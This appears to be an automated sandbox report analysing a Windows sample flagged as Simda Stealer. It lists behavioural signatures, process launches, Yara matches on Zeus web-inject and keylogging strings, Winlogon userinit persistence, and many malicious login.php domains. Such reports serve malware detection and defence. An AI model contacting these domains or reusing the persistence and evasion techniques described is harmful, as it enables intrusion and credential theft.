Windows Analysis Report
arxtPs1STE.exe

Overview

General Information

Sample name: arxtPs1STE.exe
(renamed because original name is a hash value)
Original sample name: ce4b4763d9b269ea600e8fc594781882ca6c8486.exe
Analysis ID: 1553832
MD5: 6154c4f64b8f9185a4644cdea5c69408
SHA1: ce4b4763d9b269ea600e8fc594781882ca6c8486
SHA256: a484e354b3c1d5e13033067711a085fae7e74b53c6b003c10306ed58fc9a0288
Tags: exe, user-NDA0E

Detection

Simda Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • arxtPs1STE.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\arxtPs1STE.exe" MD5: 6154C4F64B8F9185A4644CDEA5C69408)
    • svchost.exe (PID: 7652 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 5415F923D36E5D49E48A46CDF5D4B082)
      • tGYLgZxMWmmBTD.exe (PID: 7376 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7352 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7328 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7304 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7280 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7256 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7232 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7212 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7188 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 344 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7876 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 3964 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7684 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 1080 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 3872 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
00000002.00000003.1843970657.0000000002C70000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1887006927.0000000002C70000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1889204820.0000000002C70000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
2.3.svchost.exe.2c70000.17.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
2.3.svchost.exe.2c70000.10.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.883000.4.raw.unpack | JoeSecurity_SimdaStealer | Yara detected Simda Stealer | Joe Security
2.3.svchost.exe.883000.4.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x4f260:$a1: name=%s&port=%u
  • 0x4e9f8:$a2: data_inject
  • 0x4ebe4:$a3: keylog.txt
  • 0x4e88d:$a4: User-agent: %s]]]
  • 0x4f3b4:$a5: %s\%02d.bmp
2.3.svchost.exe.889000.0.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp

    System Summary

    Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\arxtPs1STE.exe, ProcessId: 7600, TargetFilename: C:\Windows\apppatch\svchost.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe
    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe
    Source: Process started | Author: vburov | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-11T18:33:22.840403+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49740 | TCP
    2024-11-11T18:34:05.064133+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.8 | 60697 | TCP
    2024-11-11T18:33:08.800308+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.8 | 49708 | TCP
    2024-11-11T18:33:09.412393+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.8 | 49718 | TCP
    2024-11-11T18:33:20.314026+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.8 | 49737 | TCP
    2024-11-11T18:33:29.077761+0100 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.8 | 58380 | TCP
    2024-11-11T18:33:08.800308+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.8 | 49708 | TCP
    2024-11-11T18:33:09.412393+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.8 | 49718 | TCP
    2024-11-11T18:33:20.314026+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.8 | 49737 | TCP
    2024-11-11T18:33:29.077761+0100 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.8 | 58380 | TCP
    2024-11-11T18:33:08.071459+0100 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.8 | 56804 | UDP
    2024-11-11T18:33:57.677062+0100 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.8 | 55157 | UDP
    2024-11-11T18:35:02.384951+0100 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.8 | 58292 | UDP

    AV Detection

    Source: arxtPs1STE.exe | Avira: detected
    Source: http://gahyqub.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://volyquk.com/login.phpAvira URL Cloud: Label: malware
    Source: http://puzyxip.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qegyhig.com/login.phprAvira URL Cloud: Label: malware
    Source: http://qegyhig.com/login.phpcAvira URL Cloud: Label: malware
    Source: http://lyryvex.com/login.phpgAvira URL Cloud: Label: malware
    Source: http://lyxywen.com/Avira URL Cloud: Label: malware
    Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
    Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lymysan.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gacyzuz.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gahyhys.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gahyzez.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pupybul.com/HAvira URL Cloud: Label: malware
    Source: http://volyzic.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qebyrev.com/login.phprAvira URL Cloud: Label: malware
    Source: http://volydot.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://vojycec.com/Avira URL Cloud: Label: malware
    Source: http://ganyfes.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pujygug.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocydyc.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyvod.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyxywer.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykymij.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyvan.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyfen.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykywid.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qexylup.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyvyxyj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pumydyg.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lymyjon.com/login.phpAvira URL Cloud: Label: malware
    Source: arxtPs1STE.exe, ReversingLabs: Detection: 84%
    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
    Source: arxtPs1STE.exe, Joe Sandbox ML: detected

    Compliance

    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Unpacked PE file: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Unpacked PE file: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Unpacked PE file: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Unpacked PE file: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Unpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack
    Source: C:\Windows\apppatch\svchost.exe Unpacked PE file: 2.2.svchost.exe.400000.1.unpack
    Source: arxtPs1STE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49719 version: TLS 1.2
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_008F9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008ED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_008FDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_008FDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_008D7680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008EE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_008A9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089D120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_008ADAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_008ADA50
